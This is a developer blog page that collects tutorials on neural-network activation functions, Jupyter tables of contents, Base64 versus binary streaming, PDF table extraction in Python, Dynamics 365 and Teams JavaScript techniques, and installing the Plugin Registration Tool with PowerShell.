" MicromOne

Pagine

Focus on Activation functions

Activation functions are a fascinating area of research in machine learning. They are a special class of mathematical functions characterized by several important properties. First of all, activation functions are usually non-linear. If all activation functions were linear, the entire neural network would collapse into a simple linear model, losing its expressive power.

Another key requirement is differentiability. Ideally, an activation function should be continuously differentiable, meaning it has a derivative everywhere. There is, however, one very popular activation function that is differentiable almost everywhere rather than everywhere.

Activation functions should also be monotonic, meaning that as the input increases, the output never decreases. In other words, when moving from left to right along the x-axis, the value of the function does not go down. Many commonly used activation functions satisfy this property.

A further important characteristic is that the activation function should approximate the identity function near the origin. This ensures that, around zero, the input is passed through without significant distortion.

Let us now look at some of the most common activation functions.

The most widely used activation function is the ReLU (Rectified Linear Unit). In many neural networks, ReLU is the default choice for hidden layers because it performs very well in practice and makes gradient computation efficient. However, ReLU lacks one of the desirable properties mentioned earlier: it is not differentiable at zero.

To address this limitation, the Leaky ReLU was introduced. Instead of outputting zero for negative inputs, Leaky ReLU outputs a small fraction of the input, allowing gradients to flow even for negative values.

In older research papers, the sigmoid activation function is frequently encountered. Sigmoid has some appealing properties: it smoothly maps inputs to values between 0 and 1 and has an easily computable derivative. However, in practice, neural networks trained with sigmoid tend to perform worse than those using ReLU, which is why sigmoid is rarely used in hidden layers today.

Another commonly used activation function is the hyperbolic tangent (tanh). Like sigmoid, tanh is bounded, but its outputs range from −1 to 1. One of its advantages is that it is centered at zero and has larger derivatives than sigmoid, making it a better choice in many cases.

There is also the step function, which is encountered in the perceptron model. While simple, it is not suitable for gradient-based learning.

Finally, in more advanced research, more esoteric activation functions may be encountered, such as the Gaussian Error Linear Unit (GELU). GELU has been adopted in several transformer-based models, including OpenAI’s GPT-3.
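
To make these definitions concrete, here is a minimal NumPy sketch of the functions discussed above; the GELU line uses the widely cited tanh approximation rather than the exact formulation, and the code is meant only as an illustration.

import numpy as np

def relu(x):
    # Outputs x for positive inputs, 0 otherwise; not differentiable at 0
    return np.maximum(0, x)

def leaky_relu(x, alpha=0.01):
    # Lets a small fraction of negative inputs through
    return np.where(x > 0, x, alpha * x)

def sigmoid(x):
    # Smoothly maps inputs to the interval (0, 1)
    return 1 / (1 + np.exp(-x))

def tanh(x):
    # Bounded between -1 and 1, centered at zero
    return np.tanh(x)

def gelu(x):
    # Common tanh-based approximation of GELU
    return 0.5 * x * (1 + np.tanh(np.sqrt(2 / np.pi) * (x + 0.044715 * x**3)))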



How to Add a Table of Contents to Your Jupyter Notebook

Working inside Jupyter notebooks is one of the most popular ways to write and share code, especially in data science, machine learning, and research workflows. As notebooks grow in length and complexity, navigating them can become frustrating. This is where a Table of Contents becomes extremely useful.

In this article, we’ll look at why a Table of Contents matters, how to create one manually, how anchors work in Jupyter, and how modern tools can generate a TOC automatically.

Why Your Notebook Needs a Table of Contents

Long notebooks with multiple sections such as data loading, preprocessing, analysis, and visualization are hard to navigate by scrolling alone. A Table of Contents helps by:

  • Improving navigation

  • Making the structure of the notebook clear

  • Enhancing readability for collaborators

  • Providing a quick overview of the workflow

This is particularly helpful when sharing notebooks or exporting them to HTML or PDF.

Creating a Manual Table of Contents with Markdown

One simple way to create a Table of Contents is by using Markdown links that point to section headers.

Example:

### Table of Contents

1. [Introduction](#introduction)
2. [Load Data](#load-data)
3. [Exploratory Analysis](#exploratory-data-analysis)
4. [Results](#results)
5. [Conclusion](#conclusion)

Each link refers to a specific section inside the notebook.

How Section Anchors Work in Jupyter Notebooks

In Jupyter notebooks, you usually do not need to manually define anchors using HTML. When you create a Markdown heading, Jupyter automatically generates an anchor for it.

Example:

## Introduction

Jupyter automatically creates the anchor:

#introduction

This means you can link to that section using:

[Introduction](#introduction)

Automatic Anchor Naming Rules

Jupyter follows these rules when creating anchors from headings:

  • All characters are converted to lowercase

  • Spaces are replaced with hyphens

  • Special characters are removed

Example:

## Exploratory Data Analysis

Generated anchor:

#exploratory-data-analysis

Link reference:

[Exploratory Analysis](#exploratory-data-analysis)
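
As a rough illustration of these rules, the following Python snippet mimics the conversion from heading text to anchor; the exact algorithm used by Jupyter and nbconvert may differ in edge cases.

import re

def heading_to_anchor(heading):
    # Lowercase, drop special characters, replace spaces with hyphens
    text = heading.strip().lower()
    text = re.sub(r"[^\w\s-]", "", text)
    return "#" + re.sub(r"\s+", "-", text)

print(heading_to_anchor("Exploratory Data Analysis"))  # -> #exploratory-data-analysis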

When to Use <a id=""></a> Manually

In most cases, Markdown headings are enough. However, manually defining an anchor using HTML can be useful in advanced scenarios, such as:

  • When you want a custom anchor name

  • When linking to a specific point that is not a heading

  • When you have duplicate section titles

Example:

<a id="custom-anchor"></a>
### My Section Title

You can then reference it like this:

[Go to section](#custom-anchor)

Automatic Table of Contents Options

If you prefer automation, there are powerful tools available.

Jupyter Notebook Extensions

The Table of Contents (2) extension from jupyter_contrib_nbextensions automatically generates a navigation panel based on notebook headings. It supports automatic updates, collapsible sections, and sidebar display.

JupyterLab Built-in Table of Contents

JupyterLab includes a built-in Table of Contents panel in the sidebar. It reads Markdown headers and allows quick navigation without installing additional extensions.


Real Video Streaming: Why Base64 Fails and How to Do It Properly

If you’ve ever been told, “You can just send video in Base64 inside JSON,” stop right there. Base64 works for small images, debugging, or prototypes, but for serious video—especially live or large files—it’s a disaster: +33% bandwidth, extra CPU, higher latency, wasted memory. No exceptions.

Here’s how real streaming works, with raw bytes, chunking, and codecs, plus a practical WebSocket example.

Why Base64 Doesn’t Work

Base64 introduces serious overhead:

  • Bandwidth: +33% compared to raw binary

  • CPU: Encoding/decoding is expensive

  • Latency: Every chunk must be converted

  • Memory: Extra buffers for the string

  • Scalability: Impossible for live or large files

Base64 is only useful for tiny assets or debugging, never production.

How Real Streaming Works

1. Raw Binary Stream

Send the video as pure bytes, never text. Options include:

  • TCP / UDP

  • WebSocket (binary)

  • HTTP chunked transfer

  • QUIC

2. Chunking

Break the video into blocks:

[chunk][chunk][chunk]

  • Typical size: 1–64 KB

  • Sequential order

  • No text encoding
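
As a minimal sketch of the chunking step (in Python rather than JavaScript, with a hypothetical file name), the sender simply reads the encoded video in fixed-size binary blocks:

CHUNK_SIZE = 32 * 1024  # 32 KB per chunk

def iter_chunks(path, chunk_size=CHUNK_SIZE):
    # Yield the video file as raw binary blocks, in order, with no text encoding
    with open(path, "rb") as f:
        while True:
            chunk = f.read(chunk_size)
            if not chunk:
                break
            yield chunk

# Each chunk can then be written to a socket or WebSocket as-is
for chunk in iter_chunks("video.ts"):
    pass  # send(chunk)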

3. Codec

You don’t send raw frames; codecs compress video efficiently:

  • H.264 / AVC (standard)

  • H.265 / HEVC (high efficiency)

  • VP9 / AV1 (open source, high quality per bandwidth)

The server sends compressed bytes, the client decodes them in real time.

Conceptual Example

Server (encoder):

Camera → H.264 encoder → byte stream → socket

Client (decoder):

socket → byte stream → decoder → frame → display

Web Options



  • WebRTC – Live, low latency

  • HLS – On-demand streaming

  • DASH – Adaptive streaming

  • WebSocket (binary) – Custom real-time prototypes

Minimal WebSocket Example (JS)

Server Node.js:

videoChunks.forEach(chunk => {
  ws.send(chunk); // Pure binary, no strings
});

Client Browser:

const socket = new WebSocket("wss://example.com/video");
socket.binaryType = "arraybuffer";

socket.onmessage = (event) => {
  const chunk = new Uint8Array(event.data);
  // Decode using MediaSource or WebCodecs
};

Notice: no Base64, only raw bytes.

Real Pipeline with FFmpeg (Conceptual)

ffmpeg -i input.mp4 \
       -c:v libx264 -preset ultrafast -f mpegts udp://127.0.0.1:1234

  • libx264 → codec

  • -f mpegts → streaming-friendly container

  • udp:// → raw stream transmission

The client receives packets and feeds them directly into the decoder.

Base64 is fine for prototypes. For large files or live streaming, you need pure binary, chunking, codecs, and a proper protocol. With WebRTC, HLS, DASH, or binary WebSocket, you get low latency, high quality, and real scalability.

In a follow-up, I can show a full demo:

  • Convert a photo/video into a raw byte stream

  • Simulate frame → chunk → stream

  • Build a real WebRTC + FFmpeg production-ready pipeline

This is the serious world of video streaming. 

Why Base64 Is Killing Your App’s Performance (And What to Use Instead)


The Hidden Cost of Base64

Base64 was never designed for data storage or high-volume file transfers.
Its original purpose was to move binary data through systems that only understood plain text.

When you use it for large payloads today, you end up paying three major taxes.

1. The 33% Size Tax

Base64 encodes every 3 bytes of binary data as 4 ASCII characters.
The result is a ~33% increase in size, every single time.

A 100 MB video suddenly becomes 133 MB of text:

  • more bandwidth consumed

  • more time spent uploading

  • more storage wasted

All for zero functional benefit.
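
You can verify the overhead with Python's standard base64 module: 3 MB of binary data encodes to exactly 4 MB of text.

import base64
import os

payload = os.urandom(3_000_000)   # 3 MB of binary data
encoded = base64.b64encode(payload)

print(len(payload))               # 3000000
print(len(encoded))               # 4000000 -> ~33% larger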

2. The Memory Bottleneck

Most Base64 encoders and decoders require the entire payload to be loaded into memory.

That means a 500 MB upload can easily cause:

  • 1 GB RAM spikes

  • garbage collection pressure

  • process crashes under load

One large request can bring an otherwise healthy server to its knees.

3. The CPU Overhead

Encoding and decoding Base64 is not free.

Your CPU must:

  • parse large strings

  • convert them back to binary

  • allocate new buffers

All of this adds latency, increases response times, and reduces overall throughput—especially under concurrent load.

3 Better Alternatives for Large Files

If you’re building a scalable, production-grade system, stop treating files as strings.
Modern architectures are binary-first.

Here are three proven approaches.

1. The Cloud-Direct Pattern (Presigned URLs)

Your API should not be a middleman for raw bytes.

Instead of:

Client → API → Object Storage

Use presigned URLs.

How it works
The client asks your API for permission.
Your API returns a short-lived, secure upload URL from providers like AWS S3 or Google Cloud Storage.
The client uploads the file directly to the cloud.

Why it wins

  • Zero file data touches your server

  • No memory spikes

  • No CPU overhead

  • Massive scalability for free

Your backend stays fast and boring. Exactly how it should be.
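
As a minimal sketch of the pattern with AWS S3 and boto3 (bucket name, key, and expiry are placeholders), the API only hands out a temporary URL:

import boto3

s3 = boto3.client("s3")

# Short-lived URL the client can use to PUT the file straight to S3
upload_url = s3.generate_presigned_url(
    "put_object",
    Params={"Bucket": "my-upload-bucket", "Key": "uploads/video.mp4"},
    ExpiresIn=900,  # 15 minutes
)

# Return upload_url to the client; the file never passes through your API
print(upload_url)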

II. Chunked & Resumable Uploads (TUS Protocol)

Uploading a 2 GB file in a single request is a gamble.

If the connection drops at 99%, the user starts over—and hates you for it.

How it works
Split the file into small chunks (e.g. 5 MB).
Upload them sequentially using a resumable protocol like TUS.

Why it wins

  • Fault-tolerant by design

  • Uploads can resume after failures

  • Ideal for unstable networks and large files

This is the standard for serious upload workflows.

3. Binary Streaming

Sometimes you do need the file on your server—virus scanning, media processing, transformations.

In that case, stream it.

How it works
Use multipart/form-data and process the incoming request as a stream.
Pipe the data chunk-by-chunk directly to disk, cloud storage, or a processing pipeline.

Why it wins

  • Constant, predictable memory usage

  • Works with arbitrarily large files

  • Plays nicely with backpressure

Streams are how servers are meant to handle data.
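
A framework-agnostic sketch of the idea in Python (the incoming object stands in for whatever stream your web framework exposes) copies the request to disk in fixed-size blocks, so memory stays constant no matter how large the file is:

CHUNK_SIZE = 5 * 1024 * 1024  # 5 MB blocks

def stream_to_disk(incoming, destination_path, chunk_size=CHUNK_SIZE):
    # Copy an incoming binary stream to disk with constant memory usage
    with open(destination_path, "wb") as out:
        while True:
            chunk = incoming.read(chunk_size)
            if not chunk:
                break
            out.write(chunk)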

Base64 is fine for:

  • small icons

  • tiny blobs

  • email attachments

But for large files, it’s pure technical debt.

If you want faster uploads, lower costs, and servers that don’t fall over when someone uploads a 4K video, move to presigned URLs, chunked uploads, or streaming.


Extracting Tables from PDFs in Python: A Practical Comparison of Tools

Working with PDFs is one of the most common (and frustrating) data engineering tasks. Unlike CSV or Excel files, PDFs are designed for visual presentation, not structured data extraction. Choosing the right Python library can save you hours of cleanup or completely break your pipeline.

In this article, we compare the most popular Python tools for extracting tables and text from PDFs, focusing on accuracy, complexity, and real-world use cases.

Quick Comparison Overview

Different tools shine in different scenarios. Here is a high-level summary before diving deeper:

Tabula-py is best for clean, well-structured tables.
Camelot is excellent for wide and complex layouts.
pdfplumber is flexible and powerful for irregular tables.
PyMuPDF is fast for text extraction but needs extra parsing.
Tesseract OCR is the only option for scanned PDFs.
pdfquery is perfect when exact coordinates are required.

Tabula-py

Type: Text-based
Output: Pandas DataFrame
Complexity: Medium

Tabula-py is a Python wrapper for Tabula (Java-based) and is one of the most popular tools for table extraction.

Pros:

  • Very easy to use

  • Direct output as Pandas DataFrames

  • Great results on clean, grid-based tables

Cons:

  • Struggles with complex layouts

  • Requires Java

Best use case: clean, well-formatted tables with clear borders.
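
A typical call looks like this (assuming Java is installed; report.pdf is a placeholder file name):

import tabula

# Returns a list of DataFrames, one per detected table
tables = tabula.read_pdf("report.pdf", pages="all", multiple_tables=True)
print(tables[0].head())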

Camelot

Type: Text-based
Output: Pandas DataFrame
Complexity: Medium

Camelot is often considered more accurate than Tabula, especially for wide tables or complex page layouts.

Pros:

  • Excellent precision

  • Handles complex table structures better than Tabula

  • Supports both lattice and stream parsing modes

Cons:

  • Slightly steeper learning curve

  • Can fail on very irregular tables

Best use case: wide tables and complex layouts where precision matters.
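
A minimal usage sketch (report.pdf is a placeholder; choose lattice or stream depending on the table style):

import camelot

# "lattice" works well for tables with visible borders; use "stream" otherwise
tables = camelot.read_pdf("report.pdf", pages="1-3", flavor="lattice")
print(tables[0].df.head())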

pdfplumber

Type: Text-based with parsing
Output: Requires processing
Complexity: Medium–High

pdfplumber offers low-level access to PDF elements and is extremely flexible.

Pros:

  • Highly customizable

  • Excellent for irregular or borderless tables

  • Can extract text, lines, and coordinates

Cons:

  • Requires manual parsing logic

  • More coding effort compared to Tabula or Camelot

Best use case: irregular tables or PDFs where automated tools fail.
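
A small sketch of the typical workflow (report.pdf is a placeholder):

import pdfplumber

with pdfplumber.open("report.pdf") as pdf:
    page = pdf.pages[0]
    table = page.extract_table()  # list of rows (lists of cell strings), or None
    text = page.extract_text()

print(table)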

PyMuPDF (fitz)

Type: Text-based
Output: Text only
Complexity: Medium

PyMuPDF is fast and efficient but does not natively extract tables.

Pros:

  • Very fast

  • High-quality text extraction

  • Good for preprocessing PDFs

Cons:

  • No built-in table extraction

  • Requires custom parsing

Best use case: fast text extraction when you plan to build your own table parser.
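
A minimal text-extraction sketch (report.pdf is a placeholder):

import fitz  # PyMuPDF

doc = fitz.open("report.pdf")
for page in doc:
    # Plain text only; any table structure must be parsed separately
    print(page.get_text())
doc.close()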

Tesseract OCR

Type: Image-based
Output: Text only
Complexity: High

When PDFs are scanned images, OCR is the only viable solution.

Pros:

  • Works with scanned PDFs

  • Supports multiple languages

Cons:

  • Lower accuracy than text-based tools

  • No table awareness

  • Requires image preprocessing

Best use case: scanned documents with no embedded text.
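
A minimal OCR sketch using the pytesseract and pdf2image wrappers (both rely on the Tesseract and Poppler binaries being installed; scanned.pdf is a placeholder):

import pytesseract
from pdf2image import convert_from_path

# Render each scanned page as an image, then run OCR on it
pages = convert_from_path("scanned.pdf", dpi=300)
for image in pages:
    print(pytesseract.image_to_string(image))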

pdfquery

Type: Text-based
Output: Text with coordinates
Complexity: High

pdfquery is ideal when you need pixel-level control.

Pros:

  • Precise coordinate-based extraction

  • Ideal for fixed-layout documents

  • Powerful for automation

Cons:

  • Complex setup

  • Not beginner-friendly

Best use case: PDFs with consistent layouts where exact positioning matters. 



Detecting Dynamics 365 Web Resource Updates with JavaScript Hashing

When working with Dynamics 365 / Dataverse Web Resources, one common challenge is ensuring users are aware when a JavaScript or HTML Web Resource has been updated. Browser caching can cause users to unknowingly run outdated versions, leading to unexpected behavior and hard-to-diagnose bugs.

In this article, we’ll look at a simple and effective technique to detect Web Resource changes at runtime using JavaScript hashing and notify users when an update is detected.

The Idea

The core idea is straightforward:

  1. Download the Web Resource content

  2. Calculate a hash (SHA-1) of the content

  3. Store the hash in localStorage

  4. Compare the current hash with the previously stored one

  5. Notify the user if the hash has changed

This approach works entirely on the client side and requires no server-side customization.

Triggering the Check on Form Load

The check is executed when a Dynamics 365 form loads:

formContext.data.addOnLoad(
  Opportunity.checkWebResourceHash.bind(this, "opportunity_webresource")
);

This ensures the verification runs automatically whenever the form is opened.

The Hash Comparison Function

Here’s the full implementation of the function responsible for detecting changes:

checkWebResourceHash: async function (webResourceName) {
  const STORAGE_KEY = `WR_HASH_${webResourceName}`;
  const STORAGE_DATE_KEY = `WR_HASH_DATE_${webResourceName}`;

  try {
    const clientUrl = Xrm.Utility.getGlobalContext().getClientUrl();
    const url = `${clientUrl}/WebResources/${webResourceName}`;

    // Fetch the Web Resource content without using cache
    const response = await fetch(url, { cache: "no-store" });
    const text = await response.text();

    // Generate SHA-1 hash
    const encoder = new TextEncoder();
    const data = encoder.encode(text);
    const hashBuffer = await crypto.subtle.digest("SHA-1", data);

    const newHash = Array.from(new Uint8Array(hashBuffer))
      .map(b => b.toString(16).padStart(2, "0"))
      .join("");

    const oldHash = localStorage.getItem(STORAGE_KEY);

    // Detect changes
    if (oldHash && oldHash !== newHash) {
      const now = new Date().toISOString();

      localStorage.setItem(STORAGE_KEY, newHash);
      localStorage.setItem(STORAGE_DATE_KEY, now);

      Xrm.Navigation.openAlertDialog({
        title: "Web Resource Update",
        text:
          `The Web Resource "${webResourceName}" has been updated.\n\n` +
          `Date: ${new Date(now).toLocaleString()}`
      });
    }

    // First-time initialization
    if (!oldHash) {
      localStorage.setItem(STORAGE_KEY, newHash);
      localStorage.setItem(STORAGE_DATE_KEY, new Date().toISOString());
    }

  } catch (e) {
    console.error("Error while checking Web Resource", webResourceName, e);
  }
}

Why SHA-1?

SHA-1 is not recommended for security purposes, but in this scenario it’s perfectly adequate:

  • We’re not securing sensitive data

  • We only need a fast and consistent checksum

  • It’s widely supported by the Web Crypto API

If you prefer, you can easily switch to SHA-256 by replacing "SHA-1" with "SHA-256".

Benefits of This Approach

  • No server-side changes

  • Works with any JavaScript or HTML Web Resource

  • Prevents silent cache-related issues

  • Improves transparency for users and testers

  • Easy to reuse across multiple forms and entities

Possible Enhancements

  • Automatically reload the page after detection

  • Display the last update date in a custom notification

  • Store hashes per environment (Dev / Test / Prod)

  • Extend the logic to multiple Web Resources at once



How to Enable Developer Tools in the New Microsoft Teams Desktop App

If you’re a developer or power user, there may be times when you need access to developer tools in Microsoft Teams. These tools are useful for inspecting elements, debugging custom apps, or troubleshooting layout issues. In the new Microsoft Teams desktop client, however, developer tools are hidden by default. Fortunately, there is a simple workaround to enable them.

Why Developer Tools Are Useful

In the web version of Microsoft Teams, opening developer tools is easy using F12 on Windows or Command + Option + I on macOS. These tools allow you to inspect HTML and CSS, view console logs, and debug issues. In the new desktop client, this functionality is not exposed in the interface, which can be frustrating for developers.

Below is a step-by-step guide to enabling developer tools in the new Teams client.

Step 1 – Create the Configuration File

Start by opening a plain text editor such as Notepad or Visual Studio Code. Create a new file and name it configuration.json. Inside the file, add the following content:

{
  "core/devMenuEnabled": true
}

Save the file to the following location on your Windows machine:

%LOCALAPPDATA%\Packages\MSTeams_8wekyb3d8bbwe\LocalCache\Microsoft\MSTeams

This folder is part of the local cache used by the new Microsoft Teams client.

Step 2 – Fully Close Microsoft Teams

Make sure Microsoft Teams is completely closed. Simply closing the window is not enough. Look for the Teams icon in the system tray, right-click it, and select “Quit”. Once the application is fully closed, reopen Microsoft Teams.

Step 3 – Open Developer Tools

After restarting Teams, right-click the Teams icon in the system tray again. You should now see a new option called “Engineering Tools”. From there, select “Open Dev Tools”.

A separate Developer Tools window will open, allowing you to inspect elements, view logs, and debug just like you would in a web browser.

Additional Notes

You may be asked to sign out and sign back in after enabling developer tools. This behavior is normal. Keep in mind that this feature is not officially documented by Microsoft and may change in future updates, but it is very useful for debugging custom Teams applications and extensions.

Even though the new Microsoft Teams client hides developer tools by default, enabling them is quick and easy with this configuration file trick. Once activated, you gain powerful debugging capabilities that can greatly improve your development and troubleshooting workflow.

Detecting Microsoft Teams Context in Dynamics 365 Using JavaScript

When working with Dynamics 365 or Power Apps embedded inside Microsoft Teams, developers often need to understand where the application is actually running.

Is it opened directly in a browser?
Is it hosted inside Microsoft Teams?
Is it loaded inside an iframe?

This article explains why window.location.href can be misleading in Teams integrations and how to detect the execution context reliably using JavaScript.

The Problem: URL Confusion in Microsoft Teams

When a Dynamics 365 app is opened inside Microsoft Teams, it is wrapped in multiple layers:

  • Microsoft Teams shell

  • Power Apps web player

  • Dynamics 365 Unified Interface (UCI)

  • Your page, usually inside an iframe

Because of this architecture, checking the URL with JavaScript like this:

const url = window.location.href;
console.log(url);

can return very different results depending on where the script runs.

Common URL Results You May Encounter

When Dynamics 365 is embedded in Teams, the URL often looks like this:

https://org.crm4.dynamics.com/uclient/main.htm?...&source=teamstab

When Dynamics 365 is opened directly in a browser, the URL may look like:

https://org.crm4.dynamics.com/main.aspx?appid=...

If the code is executed at the Teams shell level, the URL may simply be:

https://teams.microsoft.com/v2

This inconsistency makes it difficult to determine whether the app is actually running inside Microsoft Teams.

Using parent.window.location.href

If your JavaScript runs inside an iframe, you might try accessing the parent window:

const url = parent.window.location.href;
console.log(url);

In Microsoft Teams, this often still resolves to:

https://teams.microsoft.com/v2

This behavior is expected because Teams heavily sandboxes embedded content and hides the real navigation context for security reasons.

The Key Indicator: source=teamstab

In Dynamics 365, one of the most reliable indicators that the app is opened inside Microsoft Teams is the presence of the query parameter:

source=teamstab

If this parameter exists in the URL, the app was launched from a Microsoft Teams tab.

Example:

https://org.crm4.dynamics.com/uclient/main.htm?...&source=teamstab

Practical Detection Example

The following JavaScript example shows a defensive approach to detect whether the app is running outside Microsoft Teams:

const url = new URL(parent.window.location.href);

if (
  !url.toString().includes("source=teams") &&
  !url.toString().includes("teamstab")
) {
  console.log("Running outside Microsoft Teams");
} else {
  console.log("Running inside Microsoft Teams");
}

This logic works well for Dynamics 365 JavaScript customizations, web resources, embedded Power Apps, and model-driven app extensions.

Best Practices and Considerations

Avoid relying only on window.location, because in embedded scenarios it often reflects only the iframe URL.

Expect strong isolation when running inside Teams. Access to parent and top window objects may be restricted or normalized.

When available, use official APIs such as the Microsoft Teams JavaScript SDK or Power Apps context APIs. These provide explicit context information instead of relying on URL parsing.


Dynamically Loading an External Library in a Dynamics 365 Web Resource

When working with Microsoft Dynamics 365 / Dataverse, JavaScript web resources are a powerful way to extend form behavior. However, loading large third‑party libraries (like Excel parsers, charting tools, or PDF generators) directly in every context is not always ideal.

In this article, we’ll look at a clean and safe approach to dynamically loading an external JavaScript library only when it’s needed — using a real‑world example with SheetJS.

Why Load Libraries Dynamically?

There are several reasons to avoid bundling or always loading external libraries:

  • Performance – Large libraries slow down form load times

  • Context awareness – Some clients (like Microsoft Teams) have limitations

  • Reusability – Load the library only when required

  • Maintainability – Easily update the CDN version without redeploying web resources

Dynamic loading solves all of these problems.

The Scenario

We want to:

  • Execute code on form OnLoad

  • Detect the current client (Web, Outlook, Teams)

  • Load SheetJS (xlsx) only if the form is not running inside Microsoft Teams

The OnLoad Function

Here is the full JavaScript example used in a Dynamics 365 form web resource:

OnLoad: function (executionContext) {
    var formContext = executionContext.getFormContext();

    var client = Xrm.Utility
        .getGlobalContext()
        .client
        .getClient();

    if (client !== "Mobile") {
        var script = document.createElement("script");
        script.src = "https://cdn.sheetjs.com/xlsx-latest/package/dist/xlsx.full.min.js";
        script.async = true;
        script.defer = true;
        script.onload = function () {
            console.log("SheetJS library loaded successfully");
        };
        document.head.appendChild(script);
    }
}

Step‑by‑Step Breakdown

1. Access the Form Context

var formContext = executionContext.getFormContext();

This is the recommended approach for interacting with the form in modern Dynamics 365.

2. Detect the Client Type

var client = Xrm.Utility.getGlobalContext().client.getClient();

Possible values include:

  • Web

  • Mobile

  • ... 

This allows us to apply conditional logic depending on where the form is running.

3. Create the Script Element

var script = document.createElement("script");

This uses the browser’s native DOM API to inject JavaScript dynamically.

4. Load the Library from a CDN

script.src = "https://cdn.sheetjs.com/xlsx-latest/package/dist/xlsx.full.min.js";

Using a CDN ensures:

  • Faster load times

  • Automatic version updates

  • Reduced web resource size

5. Handle the Load Event

script.onload = function () {
    console.log("SheetJS library loaded successfully");
};

This guarantees that your code only executes after the library is fully available.

6. Append to the Document Head

document.head.appendChild(script);

At this point, the browser downloads and executes the external library.

Best Practices

  • Always check the client context

  • Load libraries only when necessary

  • Use onload callbacks for dependent logic

  • Avoid blocking scripts on form load

  • Don’t assume availability in Teams or Mobile clients

When Should You Use This Pattern?

Dynamic loading is ideal when:

  • Exporting data to Excel

  • Generating documents

  • Using visualization libraries

  • Adding advanced parsing or calculation logic


PowerCRM SideKick 365: A Must-Have Chrome Extension for Dynamics 365 Professionals

If you work daily with Microsoft Dynamics 365, you know how time-consuming it can be to debug forms, inspect fields, test records, or navigate between system components. PowerCRM SideKick 365 is a Chrome extension designed to significantly improve productivity for developers, testers, and functional consultants.

Download the extension here:
https://chromewebstore.google.com/detail/powercrm-sidekick-365/fjpbmdkkpoioonhibabipdbcohkcdccd

What is PowerCRM SideKick 365?

PowerCRM SideKick 365 adds a powerful side panel directly into your browser when working with Dynamics 365. It provides quick access to tools that normally require multiple clicks, advanced configuration, or external utilities.

Key Features

  • Form Tools – Show or hide logical names, enable or disable fields, auto-populate fields with random data

  • Update Records – Update any field on a record, including bulk updates

  • All Attributes Viewer – Instantly display all attributes of the current entity

  • Related Records Explorer – View and navigate all entity relationships

  • User Impersonation – Test behavior by impersonating another user

  • Plugin Trace Log Explorer – Easily read and analyze plugin trace logs

  • Quick Navigation Panel – Jump directly to Solutions, Form Editor, Azure Portal, and more

  • Config Manager – Customize which tools appear on different pages

This extension is especially valuable for debugging, testing, and speeding up repetitive CRM tasks without leaving the Dynamics interface.

Similar Chrome Extensions for Dynamics 365 and Power Platform

If you’re building a complete productivity toolkit for Dynamics 365, here are some excellent alternatives and complementary tools.

Toolshed for Power Platform / Dynamics 365
A command-based toolbox that lets you reveal hidden fields, schema names, record IDs, and run quick updates directly from the UI.

XrmWebTools
A web-based extension offering simplified access to XrmToolBox-like features such as audits, plugin logs, and user insights.

CRM 365 Helper
A lightweight extension focused on fast access to common tasks like retrieving record IDs, opening Advanced Find, workflows, and form metadata.

365 Power Pane
Provides basic form manipulation tools and shortcuts, useful for quick inspections and simple testing scenarios.

Each of these tools addresses slightly different needs, but together they can dramatically reduce development and troubleshooting time.

Security and Best Practices

Chrome extensions often require broad permissions. Before installing any tool in a production or corporate environment, make sure to review requested permissions carefully, check user reviews and update frequency, and align installation with your organization’s IT security policies.

Using trusted tools responsibly ensures productivity gains without compromising data security.

PowerCRM SideKick 365 stands out as one of the most complete Chrome extensions for Dynamics 365 professionals. Its integrated side panel and rich feature set make it a powerful companion for everyday CRM development and testing.

Try it here:
https://chromewebstore.google.com/detail/powercrm-sidekick-365/fjpbmdkkpoioonhibabipdbcohkcdccd

If you’re serious about optimizing your Dynamics 365 workflow, combining this extension with tools like Toolshed and XrmWebTools can turn your browser into a full-featured CRM productivity hub.

How to Download the Plugin Registration Tool for Dynamics 365 Using PowerShell (and Key Risks to Consider)

 

If you work with Dynamics 365 CRM / Dataverse, sooner or later you’ll need the Plugin Registration Tool (PRT). This tool is essential for registering, updating, and managing plugins in your Dynamics environment.
In this article, we’ll see how to download it using PowerShell and highlight some important risks and best practices every developer should be aware of.

Why the Plugin Registration Tool Is Important

Dynamics 365 does not provide a built-in UI for managing plugins. The Plugin Registration Tool allows you to:

  • Register plugin assemblies

  • Add and configure plugin steps

  • Define execution pipelines and filtering attributes

  • Debug and update existing plugin logic

Without this tool, managing plugins becomes nearly impossible in real-world projects.

Downloading the Plugin Registration Tool Using PowerShell

Instead of downloading executables from random sources, the safest approach is to get the tool directly from Microsoft’s official NuGet packages.

Open PowerShell as Administrator

Make sure PowerShell is running with administrator privileges, otherwise some commands may fail.

Download the NuGet executable

Run the following script to download nuget.exe locally:

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$sourceNugetExe = "https://dist.nuget.org/win-x86-commandline/latest/nuget.exe"
$targetNugetExe = ".\nuget.exe"
Remove-Item .\Tools -Force -Recurse -ErrorAction Ignore
Invoke-WebRequest $sourceNugetExe -OutFile $targetNugetExe
Set-Alias nuget $targetNugetExe -Scope Global -Verbose

This ensures you are using the latest and secure NuGet client.

Install the Plugin Registration Tool

Now download the Plugin Registration Tool package and extract it into a dedicated folder:

./nuget install Microsoft.CrmSdk.XrmTooling.PluginRegistrationTool -O .\Tools
md .\Tools\PluginRegistration
$prtFolder = Get-ChildItem ./Tools | Where-Object {$_.Name -match 'Microsoft.CrmSdk.XrmTooling.PluginRegistrationTool.'}
move .\Tools\$prtFolder\tools\*.* .\Tools\PluginRegistration
Remove-Item .\Tools\$prtFolder -Force -Recurse

Tool Ready to Use

You’ll now find the executable inside the .\Tools\PluginRegistration folder. From there, you can launch the Plugin Registration Tool and connect to your Dynamics 365 environment.

Risks, Warnings, and Best Practices

Avoid Unofficial Downloads

Downloading the Plugin Registration Tool from unofficial websites or shared ZIP files can be risky. These files may contain outdated binaries, modified or malicious code, or incompatible versions that break your environment.
Always prefer PowerShell with NuGet or other Microsoft-supported methods.

Version Compatibility Issues

Using an outdated or incompatible version of the Plugin Registration Tool can lead to connection and authentication errors, failed plugin registrations, unexpected behavior when updating assemblies, or missing and corrupted plugin steps.
This is especially critical when working across different Dynamics 365 or Dataverse versions.

Recommended Best Practices

  • Always test plugin changes in a development or sandbox environment

  • Use source control systems such as Git or Azure DevOps

  • Version your plugin assemblies properly

  • Back up existing plugin registrations before making changes

  • Consider modern tooling like Power Platform CLI (pac tool) for better ALM integration


What If Eyes Evolved Differently? Inside MIT’s New AI Vision Evolution Project


What if we could replay evolution and explore how eyes might have developed under different environmental pressures? That’s exactly what a team of researchers from MIT, Rice University, and Lund University set out to do with their groundbreaking “What if Eye…?” project — a computational framework that recreates vision evolution inside a virtual world. (eyes.mit.edu)

A Digital Sandbox for Evolution

